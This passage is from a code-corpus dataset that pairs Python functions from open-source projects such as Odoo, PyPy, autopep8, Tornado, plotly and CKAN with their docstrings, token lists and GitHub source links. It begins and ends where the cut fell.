now resets hour/minuts. Now counts leave hours instead of all-day leaves.
|
Computes working hours between two dates, taking always same hour/minuts.
|
[
"Computes",
"working",
"hours",
"between",
"two",
"dates",
"taking",
"always",
"same",
"hour",
"/",
"minuts",
"."
] |
def _interval_hours_get(self, cr, uid, id, dt_from, dt_to, resource_id=False, timezone_from_uid=None, exclude_leaves=True, context=None):
""" Computes working hours between two dates, taking always same hour/minuts.
:deprecated: OpenERP saas-3. Use get_working_hours instead. Note: since saas-3,
now resets hour/minuts. Now counts leave hours instead of all-day leaves."""
return self.get_working_hours(
cr, uid, id, dt_from, dt_to,
compute_leaves=(not exclude_leaves), resource_id=resource_id,
default_interval=(8, 16), context=context)
|
[
"def",
"_interval_hours_get",
"(",
"self",
",",
"cr",
",",
"uid",
",",
"id",
",",
"dt_from",
",",
"dt_to",
",",
"resource_id",
"=",
"False",
",",
"timezone_from_uid",
"=",
"None",
",",
"exclude_leaves",
"=",
"True",
",",
"context",
"=",
"None",
")",
":",
"return",
"self",
".",
"get_working_hours",
"(",
"cr",
",",
"uid",
",",
"id",
",",
"dt_from",
",",
"dt_to",
",",
"compute_leaves",
"=",
"(",
"not",
"exclude_leaves",
")",
",",
"resource_id",
"=",
"resource_id",
",",
"default_interval",
"=",
"(",
"8",
",",
"16",
")",
",",
"context",
"=",
"context",
")"
] |
https://github.com/buke/GreenOdoo/blob/3d8c55d426fb41fdb3f2f5a1533cfe05983ba1df/source/addons/resource/resource.py#L627-L635
|
|
mozillazg/pypy
|
2ff5cd960c075c991389f842c6d59e71cf0cb7d0
|
rpython/translator/driver.py
|
python
|
TranslationDriver.create_exe
|
(self)
|
Copy the compiled executable into current directory, which is
pypy/goal on nightly builds
|
Copy the compiled executable into current directory, which is
pypy/goal on nightly builds
|
[
"Copy",
"the",
"compiled",
"executable",
"into",
"current",
"directory",
"which",
"is",
"pypy",
"/",
"goal",
"on",
"nightly",
"builds"
] |
def create_exe(self):
""" Copy the compiled executable into current directory, which is
pypy/goal on nightly builds
"""
if self.exe_name is not None:
exename = self.c_entryp
newexename = py.path.local(exename.basename)
shutil_copy(str(exename), str(newexename))
self.log.info("copied: %s to %s" % (exename, newexename,))
if self.cbuilder.shared_library_name is not None:
soname = self.cbuilder.shared_library_name
newsoname = newexename.new(basename=soname.basename)
shutil_copy(str(soname), str(newsoname))
self.log.info("copied: %s to %s" % (soname, newsoname,))
if hasattr(self.cbuilder, 'executable_name_w'):
# Copy pypyw.exe
exename_w = self.cbuilder.executable_name_w
newexename_w = py.path.local(exename_w.basename)
self.log.info("copied: %s to %s" % (exename_w, newexename_w,))
shutil_copy(str(exename_w), str(newexename_w))
# for pypy, the import library is renamed and moved to
# libs/python32.lib, according to the pragma in pyconfig.h
libname = self.config.translation.libname
oldlibname = soname.new(ext='lib')
if not libname:
libname = oldlibname.basename
libname = str(newsoname.dirpath().join(libname))
shutil.copyfile(str(oldlibname), libname)
self.log.info("copied: %s to %s" % (oldlibname, libname,))
# the pdb file goes in the same place as pypy(w).exe
ext_to_copy = ['pdb',]
for ext in ext_to_copy:
name = soname.new(ext=ext)
newname = newexename.new(basename=soname.basename)
shutil.copyfile(str(name), str(newname.new(ext=ext)))
self.log.info("copied: %s" % (newname,))
# HACK: copy libcffi-*.dll which is required for venvs
# At some point, we should stop doing this, and instead
# use the artifact from packaging the build instead
libffi = py.path.local.sysfind('libffi-8.dll')
if sys.platform == 'win32' and not libffi:
raise RuntimeError('could not find libffi')
elif libffi:
# in tests, we can mock using windows without libffi
shutil.copyfile(str(libffi), os.getcwd() + r'\libffi-8.dll')
self.c_entryp = newexename
self.log.info("created: %s" % (self.c_entryp,))
|
[
"def",
"create_exe",
"(",
"self",
")",
":",
"if",
"self",
".",
"exe_name",
"is",
"not",
"None",
":",
"exename",
"=",
"self",
".",
"c_entryp",
"newexename",
"=",
"py",
".",
"path",
".",
"local",
"(",
"exename",
".",
"basename",
")",
"shutil_copy",
"(",
"str",
"(",
"exename",
")",
",",
"str",
"(",
"newexename",
")",
")",
"self",
".",
"log",
".",
"info",
"(",
"\"copied: %s to %s\"",
"%",
"(",
"exename",
",",
"newexename",
",",
")",
")",
"if",
"self",
".",
"cbuilder",
".",
"shared_library_name",
"is",
"not",
"None",
":",
"soname",
"=",
"self",
".",
"cbuilder",
".",
"shared_library_name",
"newsoname",
"=",
"newexename",
".",
"new",
"(",
"basename",
"=",
"soname",
".",
"basename",
")",
"shutil_copy",
"(",
"str",
"(",
"soname",
")",
",",
"str",
"(",
"newsoname",
")",
")",
"self",
".",
"log",
".",
"info",
"(",
"\"copied: %s to %s\"",
"%",
"(",
"soname",
",",
"newsoname",
",",
")",
")",
"if",
"hasattr",
"(",
"self",
".",
"cbuilder",
",",
"'executable_name_w'",
")",
":",
"# Copy pypyw.exe",
"exename_w",
"=",
"self",
".",
"cbuilder",
".",
"executable_name_w",
"newexename_w",
"=",
"py",
".",
"path",
".",
"local",
"(",
"exename_w",
".",
"basename",
")",
"self",
".",
"log",
".",
"info",
"(",
"\"copied: %s to %s\"",
"%",
"(",
"exename_w",
",",
"newexename_w",
",",
")",
")",
"shutil_copy",
"(",
"str",
"(",
"exename_w",
")",
",",
"str",
"(",
"newexename_w",
")",
")",
"# for pypy, the import library is renamed and moved to",
"# libs/python32.lib, according to the pragma in pyconfig.h",
"libname",
"=",
"self",
".",
"config",
".",
"translation",
".",
"libname",
"oldlibname",
"=",
"soname",
".",
"new",
"(",
"ext",
"=",
"'lib'",
")",
"if",
"not",
"libname",
":",
"libname",
"=",
"oldlibname",
".",
"basename",
"libname",
"=",
"str",
"(",
"newsoname",
".",
"dirpath",
"(",
")",
".",
"join",
"(",
"libname",
")",
")",
"shutil",
".",
"copyfile",
"(",
"str",
"(",
"oldlibname",
")",
",",
"libname",
")",
"self",
".",
"log",
".",
"info",
"(",
"\"copied: %s to %s\"",
"%",
"(",
"oldlibname",
",",
"libname",
",",
")",
")",
"# the pdb file goes in the same place as pypy(w).exe",
"ext_to_copy",
"=",
"[",
"'pdb'",
",",
"]",
"for",
"ext",
"in",
"ext_to_copy",
":",
"name",
"=",
"soname",
".",
"new",
"(",
"ext",
"=",
"ext",
")",
"newname",
"=",
"newexename",
".",
"new",
"(",
"basename",
"=",
"soname",
".",
"basename",
")",
"shutil",
".",
"copyfile",
"(",
"str",
"(",
"name",
")",
",",
"str",
"(",
"newname",
".",
"new",
"(",
"ext",
"=",
"ext",
")",
")",
")",
"self",
".",
"log",
".",
"info",
"(",
"\"copied: %s\"",
"%",
"(",
"newname",
",",
")",
")",
"# HACK: copy libcffi-*.dll which is required for venvs",
"# At some point, we should stop doing this, and instead",
"# use the artifact from packaging the build instead",
"libffi",
"=",
"py",
".",
"path",
".",
"local",
".",
"sysfind",
"(",
"'libffi-8.dll'",
")",
"if",
"sys",
".",
"platform",
"==",
"'win32'",
"and",
"not",
"libffi",
":",
"raise",
"RuntimeError",
"(",
"'could not find libffi'",
")",
"elif",
"libffi",
":",
"# in tests, we can mock using windows without libffi",
"shutil",
".",
"copyfile",
"(",
"str",
"(",
"libffi",
")",
",",
"os",
".",
"getcwd",
"(",
")",
"+",
"r'\\libffi-8.dll'",
")",
"self",
".",
"c_entryp",
"=",
"newexename",
"self",
".",
"log",
".",
"info",
"(",
"\"created: %s\"",
"%",
"(",
"self",
".",
"c_entryp",
",",
")",
")"
] |
https://github.com/mozillazg/pypy/blob/2ff5cd960c075c991389f842c6d59e71cf0cb7d0/rpython/translator/driver.py#L476-L522
|
||
microsoft/debugpy
|
be8dd607f6837244e0b565345e497aff7a0c08bf
|
src/debugpy/_vendored/pydevd/third_party/pep8/autopep8.py
|
python
|
shorten_comment
|
(line, max_line_length, last_comment=False)
|
Return trimmed or split long comment line.
If there are no comments immediately following it, do a text wrap.
Doing this wrapping on all comments in general would lead to jagged
comment text.
|
Return trimmed or split long comment line.
|
[
"Return",
"trimmed",
"or",
"split",
"long",
"comment",
"line",
"."
] |
def shorten_comment(line, max_line_length, last_comment=False):
"""Return trimmed or split long comment line.
If there are no comments immediately following it, do a text wrap.
Doing this wrapping on all comments in general would lead to jagged
comment text.
"""
assert len(line) > max_line_length
line = line.rstrip()
# PEP 8 recommends 72 characters for comment text.
indentation = _get_indentation(line) + '# '
max_line_length = min(max_line_length,
len(indentation) + 72)
MIN_CHARACTER_REPEAT = 5
if (
len(line) - len(line.rstrip(line[-1])) >= MIN_CHARACTER_REPEAT and
not line[-1].isalnum()
):
# Trim comments that end with things like ---------
return line[:max_line_length] + '\n'
elif last_comment and re.match(r'\s*#+\s*\w+', line):
split_lines = textwrap.wrap(line.lstrip(' \t#'),
initial_indent=indentation,
subsequent_indent=indentation,
width=max_line_length,
break_long_words=False,
break_on_hyphens=False)
return '\n'.join(split_lines) + '\n'
else:
return line + '\n'
|
[
"def",
"shorten_comment",
"(",
"line",
",",
"max_line_length",
",",
"last_comment",
"=",
"False",
")",
":",
"assert",
"len",
"(",
"line",
")",
">",
"max_line_length",
"line",
"=",
"line",
".",
"rstrip",
"(",
")",
"# PEP 8 recommends 72 characters for comment text.",
"indentation",
"=",
"_get_indentation",
"(",
"line",
")",
"+",
"'# '",
"max_line_length",
"=",
"min",
"(",
"max_line_length",
",",
"len",
"(",
"indentation",
")",
"+",
"72",
")",
"MIN_CHARACTER_REPEAT",
"=",
"5",
"if",
"(",
"len",
"(",
"line",
")",
"-",
"len",
"(",
"line",
".",
"rstrip",
"(",
"line",
"[",
"-",
"1",
"]",
")",
")",
">=",
"MIN_CHARACTER_REPEAT",
"and",
"not",
"line",
"[",
"-",
"1",
"]",
".",
"isalnum",
"(",
")",
")",
":",
"# Trim comments that end with things like ---------",
"return",
"line",
"[",
":",
"max_line_length",
"]",
"+",
"'\\n'",
"elif",
"last_comment",
"and",
"re",
".",
"match",
"(",
"r'\\s*#+\\s*\\w+'",
",",
"line",
")",
":",
"split_lines",
"=",
"textwrap",
".",
"wrap",
"(",
"line",
".",
"lstrip",
"(",
"' \\t#'",
")",
",",
"initial_indent",
"=",
"indentation",
",",
"subsequent_indent",
"=",
"indentation",
",",
"width",
"=",
"max_line_length",
",",
"break_long_words",
"=",
"False",
",",
"break_on_hyphens",
"=",
"False",
")",
"return",
"'\\n'",
".",
"join",
"(",
"split_lines",
")",
"+",
"'\\n'",
"else",
":",
"return",
"line",
"+",
"'\\n'"
] |
https://github.com/microsoft/debugpy/blob/be8dd607f6837244e0b565345e497aff7a0c08bf/src/debugpy/_vendored/pydevd/third_party/pep8/autopep8.py#L2927-L2959
|
||
mtivadar/qiew
|
87a3b96b43f1745a6b3f1fcfebce5164d2a40a14
|
plugins/format/binary.py
|
python
|
Binary.getBanners
|
(self)
|
return [Banners.FileAddrBanner(self.dataModel, self._viewMode), Banners.TopBanner(self.dataModel, self._viewMode), Banners.BottomBanner(self.dataModel, self._viewMode)]
|
[] |
def getBanners(self):
return [Banners.FileAddrBanner(self.dataModel, self._viewMode), Banners.TopBanner(self.dataModel, self._viewMode), Banners.BottomBanner(self.dataModel, self._viewMode)]
|
[
"def",
"getBanners",
"(",
"self",
")",
":",
"return",
"[",
"Banners",
".",
"FileAddrBanner",
"(",
"self",
".",
"dataModel",
",",
"self",
".",
"_viewMode",
")",
",",
"Banners",
".",
"TopBanner",
"(",
"self",
".",
"dataModel",
",",
"self",
".",
"_viewMode",
")",
",",
"Banners",
".",
"BottomBanner",
"(",
"self",
".",
"dataModel",
",",
"self",
".",
"_viewMode",
")",
"]"
] |
https://github.com/mtivadar/qiew/blob/87a3b96b43f1745a6b3f1fcfebce5164d2a40a14/plugins/format/binary.py#L48-L49
|
|||
opendevops-cn/opendevops
|
538dc9b93bd7c08f36a2d6a7eb8df848f7d7f3d0
|
scripts/tornado_source_code/tornado/autoreload.py
|
python
|
add_reload_hook
|
(fn: Callable[[], None])
|
Add a function to be called before reloading the process.
Note that for open file and socket handles it is generally
preferable to set the ``FD_CLOEXEC`` flag (using `fcntl` or
``tornado.platform.auto.set_close_exec``) instead
of using a reload hook to close them.
|
Add a function to be called before reloading the process.
|
[
"Add",
"a",
"function",
"to",
"be",
"called",
"before",
"reloading",
"the",
"process",
"."
] |
def add_reload_hook(fn: Callable[[], None]) -> None:
"""Add a function to be called before reloading the process.
Note that for open file and socket handles it is generally
preferable to set the ``FD_CLOEXEC`` flag (using `fcntl` or
``tornado.platform.auto.set_close_exec``) instead
of using a reload hook to close them.
"""
_reload_hooks.append(fn)
|
[
"def",
"add_reload_hook",
"(",
"fn",
":",
"Callable",
"[",
"[",
"]",
",",
"None",
"]",
")",
"->",
"None",
":",
"_reload_hooks",
".",
"append",
"(",
"fn",
")"
] |
https://github.com/opendevops-cn/opendevops/blob/538dc9b93bd7c08f36a2d6a7eb8df848f7d7f3d0/scripts/tornado_source_code/tornado/autoreload.py#L156-L164
|
||
bcbio/bcbio-nextgen
|
c80f9b6b1be3267d1f981b7035e3b72441d258f2
|
bcbio/cwl/workflow.py
|
python
|
_merge_wf_inputs
|
(new, out, wf_outputs, to_ignore, parallel, nested_inputs)
|
return out, remapped_new
|
Merge inputs for a sub-workflow, adding any not present inputs in out.
Skips inputs that are internally generated or generated and ignored, keeping
only as inputs those that we do not generate internally.
|
Merge inputs for a sub-workflow, adding any not present inputs in out.
|
[
"Merge",
"inputs",
"for",
"a",
"sub",
"-",
"workflow",
"adding",
"any",
"not",
"present",
"inputs",
"in",
"out",
"."
] |
def _merge_wf_inputs(new, out, wf_outputs, to_ignore, parallel, nested_inputs):
"""Merge inputs for a sub-workflow, adding any not present inputs in out.
Skips inputs that are internally generated or generated and ignored, keeping
only as inputs those that we do not generate internally.
"""
internal_generated_ids = []
for vignore in to_ignore:
vignore_id = _get_string_vid(vignore)
# ignore anything we generate internally, but not those we need to pull in
# from the external process
if vignore_id not in [v["id"] for v in wf_outputs]:
internal_generated_ids.append(vignore_id)
ignore_ids = set(internal_generated_ids + [v["id"] for v in wf_outputs])
cur_ids = set([v["id"] for v in out])
remapped_new = []
for v in new:
remapped_v = copy.deepcopy(v)
outv = copy.deepcopy(v)
outv["id"] = get_base_id(v["id"])
outv["source"] = v["id"]
if outv["id"] not in cur_ids and outv["id"] not in ignore_ids:
if nested_inputs and v["id"] in nested_inputs:
outv = _flatten_nested_input(outv)
out.append(outv)
if remapped_v["id"] in set([v["source"] for v in out]):
remapped_v["source"] = get_base_id(remapped_v["id"])
remapped_new.append(remapped_v)
return out, remapped_new
|
[
"def",
"_merge_wf_inputs",
"(",
"new",
",",
"out",
",",
"wf_outputs",
",",
"to_ignore",
",",
"parallel",
",",
"nested_inputs",
")",
":",
"internal_generated_ids",
"=",
"[",
"]",
"for",
"vignore",
"in",
"to_ignore",
":",
"vignore_id",
"=",
"_get_string_vid",
"(",
"vignore",
")",
"# ignore anything we generate internally, but not those we need to pull in",
"# from the external process",
"if",
"vignore_id",
"not",
"in",
"[",
"v",
"[",
"\"id\"",
"]",
"for",
"v",
"in",
"wf_outputs",
"]",
":",
"internal_generated_ids",
".",
"append",
"(",
"vignore_id",
")",
"ignore_ids",
"=",
"set",
"(",
"internal_generated_ids",
"+",
"[",
"v",
"[",
"\"id\"",
"]",
"for",
"v",
"in",
"wf_outputs",
"]",
")",
"cur_ids",
"=",
"set",
"(",
"[",
"v",
"[",
"\"id\"",
"]",
"for",
"v",
"in",
"out",
"]",
")",
"remapped_new",
"=",
"[",
"]",
"for",
"v",
"in",
"new",
":",
"remapped_v",
"=",
"copy",
".",
"deepcopy",
"(",
"v",
")",
"outv",
"=",
"copy",
".",
"deepcopy",
"(",
"v",
")",
"outv",
"[",
"\"id\"",
"]",
"=",
"get_base_id",
"(",
"v",
"[",
"\"id\"",
"]",
")",
"outv",
"[",
"\"source\"",
"]",
"=",
"v",
"[",
"\"id\"",
"]",
"if",
"outv",
"[",
"\"id\"",
"]",
"not",
"in",
"cur_ids",
"and",
"outv",
"[",
"\"id\"",
"]",
"not",
"in",
"ignore_ids",
":",
"if",
"nested_inputs",
"and",
"v",
"[",
"\"id\"",
"]",
"in",
"nested_inputs",
":",
"outv",
"=",
"_flatten_nested_input",
"(",
"outv",
")",
"out",
".",
"append",
"(",
"outv",
")",
"if",
"remapped_v",
"[",
"\"id\"",
"]",
"in",
"set",
"(",
"[",
"v",
"[",
"\"source\"",
"]",
"for",
"v",
"in",
"out",
"]",
")",
":",
"remapped_v",
"[",
"\"source\"",
"]",
"=",
"get_base_id",
"(",
"remapped_v",
"[",
"\"id\"",
"]",
")",
"remapped_new",
".",
"append",
"(",
"remapped_v",
")",
"return",
"out",
",",
"remapped_new"
] |
https://github.com/bcbio/bcbio-nextgen/blob/c80f9b6b1be3267d1f981b7035e3b72441d258f2/bcbio/cwl/workflow.py#L72-L100
|
|
keon/algorithms
|
23d4e85a506eaeaff315e855be12f8dbe47a7ec3
|
algorithms/tree/segment_tree/iterative_segment_tree.py
|
python
|
SegmentTree.build_tree
|
(self)
|
[] |
def build_tree(self):
for i in range(self.size - 1, 0, -1):
self.tree[i] = self.fn(self.tree[i * 2], self.tree[i * 2 + 1])
|
[
"def",
"build_tree",
"(",
"self",
")",
":",
"for",
"i",
"in",
"range",
"(",
"self",
".",
"size",
"-",
"1",
",",
"0",
",",
"-",
"1",
")",
":",
"self",
".",
"tree",
"[",
"i",
"]",
"=",
"self",
".",
"fn",
"(",
"self",
".",
"tree",
"[",
"i",
"*",
"2",
"]",
",",
"self",
".",
"tree",
"[",
"i",
"*",
"2",
"+",
"1",
"]",
")"
] |
https://github.com/keon/algorithms/blob/23d4e85a506eaeaff315e855be12f8dbe47a7ec3/algorithms/tree/segment_tree/iterative_segment_tree.py#L33-L35
|
||||
pantsbuild/pex
|
473c6ac732ed4bc338b4b20a9ec930d1d722c9b4
|
pex/vendor/_vendored/pip/pip/_vendor/pep517/wrappers.py
|
python
|
HookMissing.__init__
|
(self, hook_name)
|
[] |
def __init__(self, hook_name):
super(HookMissing, self).__init__(hook_name)
self.hook_name = hook_name
|
[
"def",
"__init__",
"(",
"self",
",",
"hook_name",
")",
":",
"super",
"(",
"HookMissing",
",",
"self",
")",
".",
"__init__",
"(",
"hook_name",
")",
"self",
".",
"hook_name",
"=",
"hook_name"
] |
https://github.com/pantsbuild/pex/blob/473c6ac732ed4bc338b4b20a9ec930d1d722c9b4/pex/vendor/_vendored/pip/pip/_vendor/pep517/wrappers.py#L58-L60
|
||||
plotly/plotly.py
|
cfad7862594b35965c0e000813bd7805e8494a5b
|
packages/python/plotly/plotly/figure_factory/utils.py
|
python
|
annotation_dict_for_label
|
(
text,
lane,
num_of_lanes,
subplot_spacing,
row_col="col",
flipped=True,
right_side=True,
text_color="#0f0f0f",
)
|
return annotation_dict
|
Returns annotation dict for label of n labels of a 1xn or nx1 subplot.
:param (str) text: the text for a label.
:param (int) lane: the label number for text. From 1 to n inclusive.
:param (int) num_of_lanes: the number 'n' of rows or columns in subplot.
:param (float) subplot_spacing: the value for the horizontal_spacing and
vertical_spacing params in your plotly.tools.make_subplots() call.
:param (str) row_col: choose whether labels are placed along rows or
columns.
:param (bool) flipped: flips text by 90 degrees. Text is printed
horizontally if set to True and row_col='row', or if False and
row_col='col'.
:param (bool) right_side: only applicable if row_col is set to 'row'.
:param (str) text_color: color of the text.
|
Returns annotation dict for label of n labels of a 1xn or nx1 subplot.
|
[
"Returns",
"annotation",
"dict",
"for",
"label",
"of",
"n",
"labels",
"of",
"a",
"1xn",
"or",
"nx1",
"subplot",
"."
] |
def annotation_dict_for_label(
text,
lane,
num_of_lanes,
subplot_spacing,
row_col="col",
flipped=True,
right_side=True,
text_color="#0f0f0f",
):
"""
Returns annotation dict for label of n labels of a 1xn or nx1 subplot.
:param (str) text: the text for a label.
:param (int) lane: the label number for text. From 1 to n inclusive.
:param (int) num_of_lanes: the number 'n' of rows or columns in subplot.
:param (float) subplot_spacing: the value for the horizontal_spacing and
vertical_spacing params in your plotly.tools.make_subplots() call.
:param (str) row_col: choose whether labels are placed along rows or
columns.
:param (bool) flipped: flips text by 90 degrees. Text is printed
horizontally if set to True and row_col='row', or if False and
row_col='col'.
:param (bool) right_side: only applicable if row_col is set to 'row'.
:param (str) text_color: color of the text.
"""
l = (1 - (num_of_lanes - 1) * subplot_spacing) / (num_of_lanes)
if not flipped:
xanchor = "center"
yanchor = "middle"
if row_col == "col":
x = (lane - 1) * (l + subplot_spacing) + 0.5 * l
y = 1.03
textangle = 0
elif row_col == "row":
y = (lane - 1) * (l + subplot_spacing) + 0.5 * l
x = 1.03
textangle = 90
else:
if row_col == "col":
xanchor = "center"
yanchor = "bottom"
x = (lane - 1) * (l + subplot_spacing) + 0.5 * l
y = 1.0
textangle = 270
elif row_col == "row":
yanchor = "middle"
y = (lane - 1) * (l + subplot_spacing) + 0.5 * l
if right_side:
x = 1.0
xanchor = "left"
else:
x = -0.01
xanchor = "right"
textangle = 0
annotation_dict = dict(
textangle=textangle,
xanchor=xanchor,
yanchor=yanchor,
x=x,
y=y,
showarrow=False,
xref="paper",
yref="paper",
text=text,
font=dict(size=13, color=text_color),
)
return annotation_dict
|
[
"def",
"annotation_dict_for_label",
"(",
"text",
",",
"lane",
",",
"num_of_lanes",
",",
"subplot_spacing",
",",
"row_col",
"=",
"\"col\"",
",",
"flipped",
"=",
"True",
",",
"right_side",
"=",
"True",
",",
"text_color",
"=",
"\"#0f0f0f\"",
",",
")",
":",
"l",
"=",
"(",
"1",
"-",
"(",
"num_of_lanes",
"-",
"1",
")",
"*",
"subplot_spacing",
")",
"/",
"(",
"num_of_lanes",
")",
"if",
"not",
"flipped",
":",
"xanchor",
"=",
"\"center\"",
"yanchor",
"=",
"\"middle\"",
"if",
"row_col",
"==",
"\"col\"",
":",
"x",
"=",
"(",
"lane",
"-",
"1",
")",
"*",
"(",
"l",
"+",
"subplot_spacing",
")",
"+",
"0.5",
"*",
"l",
"y",
"=",
"1.03",
"textangle",
"=",
"0",
"elif",
"row_col",
"==",
"\"row\"",
":",
"y",
"=",
"(",
"lane",
"-",
"1",
")",
"*",
"(",
"l",
"+",
"subplot_spacing",
")",
"+",
"0.5",
"*",
"l",
"x",
"=",
"1.03",
"textangle",
"=",
"90",
"else",
":",
"if",
"row_col",
"==",
"\"col\"",
":",
"xanchor",
"=",
"\"center\"",
"yanchor",
"=",
"\"bottom\"",
"x",
"=",
"(",
"lane",
"-",
"1",
")",
"*",
"(",
"l",
"+",
"subplot_spacing",
")",
"+",
"0.5",
"*",
"l",
"y",
"=",
"1.0",
"textangle",
"=",
"270",
"elif",
"row_col",
"==",
"\"row\"",
":",
"yanchor",
"=",
"\"middle\"",
"y",
"=",
"(",
"lane",
"-",
"1",
")",
"*",
"(",
"l",
"+",
"subplot_spacing",
")",
"+",
"0.5",
"*",
"l",
"if",
"right_side",
":",
"x",
"=",
"1.0",
"xanchor",
"=",
"\"left\"",
"else",
":",
"x",
"=",
"-",
"0.01",
"xanchor",
"=",
"\"right\"",
"textangle",
"=",
"0",
"annotation_dict",
"=",
"dict",
"(",
"textangle",
"=",
"textangle",
",",
"xanchor",
"=",
"xanchor",
",",
"yanchor",
"=",
"yanchor",
",",
"x",
"=",
"x",
",",
"y",
"=",
"y",
",",
"showarrow",
"=",
"False",
",",
"xref",
"=",
"\"paper\"",
",",
"yref",
"=",
"\"paper\"",
",",
"text",
"=",
"text",
",",
"font",
"=",
"dict",
"(",
"size",
"=",
"13",
",",
"color",
"=",
"text_color",
")",
",",
")",
"return",
"annotation_dict"
] |
https://github.com/plotly/plotly.py/blob/cfad7862594b35965c0e000813bd7805e8494a5b/packages/python/plotly/plotly/figure_factory/utils.py#L192-L260
|
|
JetBrains/python-skeletons
|
95ad24b666e475998e5d1cc02ed53a2188036167
|
numpy/core/__init__.py
|
python
|
uintc.__divmod__
|
(self, *args, **kwargs)
|
Return divmod(self, value).
|
Return divmod(self, value).
|
[
"Return",
"divmod",
"(",
"self",
"value",
")",
"."
] |
def __divmod__(self, *args, **kwargs): # real signature unknown
""" Return divmod(self, value). """
pass
|
[
"def",
"__divmod__",
"(",
"self",
",",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
":",
"# real signature unknown",
"pass"
] |
https://github.com/JetBrains/python-skeletons/blob/95ad24b666e475998e5d1cc02ed53a2188036167/numpy/core/__init__.py#L4627-L4629
|
||
r9y9/deepvoice3_pytorch
|
a5c24624bad314db5a5dcb0ea320fc3623a94f15
|
nikl_preprocess/prepare_metafile.py
|
python
|
pe
|
(cmd, shell=False)
|
return ret
|
Print and execute command on system
|
Print and execute command on system
|
[
"Print",
"and",
"execute",
"command",
"on",
"system"
] |
def pe(cmd, shell=False):
"""
Print and execute command on system
"""
ret = []
for line in execute(cmd, shell=shell):
ret.append(line)
print(line, end="")
return ret
|
[
"def",
"pe",
"(",
"cmd",
",",
"shell",
"=",
"False",
")",
":",
"ret",
"=",
"[",
"]",
"for",
"line",
"in",
"execute",
"(",
"cmd",
",",
"shell",
"=",
"shell",
")",
":",
"ret",
".",
"append",
"(",
"line",
")",
"print",
"(",
"line",
",",
"end",
"=",
"\"\"",
")",
"return",
"ret"
] |
https://github.com/r9y9/deepvoice3_pytorch/blob/a5c24624bad314db5a5dcb0ea320fc3623a94f15/nikl_preprocess/prepare_metafile.py#L20-L28
|
|
ckan/ckan
|
b3b01218ad88ed3fb914b51018abe8b07b07bff3
|
ckan/logic/action/get.py
|
python
|
organization_list_for_user
|
(context, data_dict)
|
return orgs_list
|
Return the organizations that the user has a given permission for.
Specifically it returns the list of organizations that the currently
authorized user has a given permission (for example: "manage_group")
against.
By default this returns the list of organizations that the currently
authorized user is member of, in any capacity.
When a user becomes a member of an organization in CKAN they're given a
"capacity" (sometimes called a "role"), for example "member", "editor" or
"admin".
Each of these roles has certain permissions associated with it. For example
the admin role has the "admin" permission (which means they have permission
to do anything). The editor role has permissions like "create_dataset",
"update_dataset" and "delete_dataset". The member role has the "read"
permission.
This function returns the list of organizations that the authorized user
has a given permission for. For example the list of organizations that the
user is an admin of, or the list of organizations that the user can create
datasets in. This takes account of when permissions cascade down an
organization hierarchy.
:param id: the name or id of the user to get the organization list for
(optional, defaults to the currently authorized user (logged in or via
API key))
:type id: string
:param permission: the permission the user has against the
returned organizations, for example ``"read"`` or ``"create_dataset"``
(optional, default: ``"manage_group"``)
:type permission: string
:param include_dataset_count: include the package_count in each org
(optional, default: ``False``)
:type include_dataset_count: bool
:returns: list of organizations that the user has the given permission for
:rtype: list of dicts
|
Return the organizations that the user has a given permission for.
|
[
"Return",
"the",
"organizations",
"that",
"the",
"user",
"has",
"a",
"given",
"permission",
"for",
"."
] |
def organization_list_for_user(context, data_dict):
'''Return the organizations that the user has a given permission for.
Specifically it returns the list of organizations that the currently
authorized user has a given permission (for example: "manage_group")
against.
By default this returns the list of organizations that the currently
authorized user is member of, in any capacity.
When a user becomes a member of an organization in CKAN they're given a
"capacity" (sometimes called a "role"), for example "member", "editor" or
"admin".
Each of these roles has certain permissions associated with it. For example
the admin role has the "admin" permission (which means they have permission
to do anything). The editor role has permissions like "create_dataset",
"update_dataset" and "delete_dataset". The member role has the "read"
permission.
This function returns the list of organizations that the authorized user
has a given permission for. For example the list of organizations that the
user is an admin of, or the list of organizations that the user can create
datasets in. This takes account of when permissions cascade down an
organization hierarchy.
:param id: the name or id of the user to get the organization list for
(optional, defaults to the currently authorized user (logged in or via
API key))
:type id: string
:param permission: the permission the user has against the
returned organizations, for example ``"read"`` or ``"create_dataset"``
(optional, default: ``"manage_group"``)
:type permission: string
:param include_dataset_count: include the package_count in each org
(optional, default: ``False``)
:type include_dataset_count: bool
:returns: list of organizations that the user has the given permission for
:rtype: list of dicts
'''
model = context['model']
if data_dict.get('id'):
user_obj = model.User.get(data_dict['id'])
if not user_obj:
raise NotFound
user = user_obj.name
else:
user = context['user']
_check_access('organization_list_for_user', context, data_dict)
sysadmin = authz.is_sysadmin(user)
orgs_q = model.Session.query(model.Group) \
.filter(model.Group.is_organization == True) \
.filter(model.Group.state == 'active')
if sysadmin:
orgs_and_capacities = [(org, 'admin') for org in orgs_q.all()]
else:
# for non-Sysadmins check they have the required permission
permission = data_dict.get('permission', 'manage_group')
roles = authz.get_roles_with_permission(permission)
if not roles:
return []
user_id = authz.get_user_id_for_username(user, allow_none=True)
if not user_id:
return []
q = model.Session.query(model.Member, model.Group) \
.filter(model.Member.table_name == 'user') \
.filter(model.Member.capacity.in_(roles)) \
.filter(model.Member.table_id == user_id) \
.filter(model.Member.state == 'active') \
.join(model.Group)
group_ids = set()
roles_that_cascade = \
authz.check_config_permission('roles_that_cascade_to_sub_groups')
group_ids_to_capacities = {}
for member, group in q.all():
if member.capacity in roles_that_cascade:
children_group_ids = [
grp_tuple[0] for grp_tuple
in group.get_children_group_hierarchy(type='organization')
]
for group_id in children_group_ids:
group_ids_to_capacities[group_id] = member.capacity
group_ids |= set(children_group_ids)
group_ids_to_capacities[group.id] = member.capacity
group_ids.add(group.id)
if not group_ids:
return []
orgs_q = orgs_q.filter(model.Group.id.in_(group_ids))
orgs_and_capacities = [
(org, group_ids_to_capacities[org.id]) for org in orgs_q.all()]
context['with_capacity'] = True
orgs_list = model_dictize.group_list_dictize(orgs_and_capacities, context,
with_package_counts=asbool(data_dict.get('include_dataset_count')))
return orgs_list
|
[
"def",
"organization_list_for_user",
"(",
"context",
",",
"data_dict",
")",
":",
"model",
"=",
"context",
"[",
"'model'",
"]",
"if",
"data_dict",
".",
"get",
"(",
"'id'",
")",
":",
"user_obj",
"=",
"model",
".",
"User",
".",
"get",
"(",
"data_dict",
"[",
"'id'",
"]",
")",
"if",
"not",
"user_obj",
":",
"raise",
"NotFound",
"user",
"=",
"user_obj",
".",
"name",
"else",
":",
"user",
"=",
"context",
"[",
"'user'",
"]",
"_check_access",
"(",
